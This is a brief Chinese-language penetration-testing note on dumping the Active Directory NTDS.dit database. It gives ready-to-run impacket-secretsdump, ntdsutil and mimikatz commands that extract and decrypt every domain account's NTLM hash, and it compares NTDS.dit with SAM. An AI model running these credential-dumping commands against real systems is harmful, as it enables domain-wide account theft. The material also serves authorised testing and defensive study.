导出NTDS.dit

1. 介绍

ntds.ditActive Directory(AD)数据库文件,存储了整个域的用户账户信息,包括域管理员和所有域用户的 NTLM 哈希
需要从 C:\Windows\NTDS\ntds.dit 提取数据,并且通常需要 SYSTEM 注册表文件进行解密
一般需要有域管的权限才能导出

2. 使用

使用 Impacket脚本利用指南 > 5.1. secretsdump.py

impacket-secretsdump -just-dc -outputfile ntds_dump DOMAIN/Administrator@DC_IP

使用windows自带的ntdsutil命令

ntdsutil "ac i ntds" "ifm" "create full C:\temp" q q

使用 mimikatz

lsadump::ntds /path:C:\Windows\NTDS\ntds.dit /system:C:\Windows\System32\config\SYSTEM

导出后进行解密

impacket-secretsdump -ntds ntds.dit -system SYSTEM -outputfile hashes LOCAL

3. NTDS.dit与SAM的区别

  • ntds.ditActive Directory(AD)数据库文件,存储了整个域的用户账户信息,包括域管理员和所有域用户的 NTLM 哈希
  • SAM(Security Account Manager)数据库存储的是本地用户账户信息,包括本地管理员账户(不包含域账户
    Pasted image 20250315165157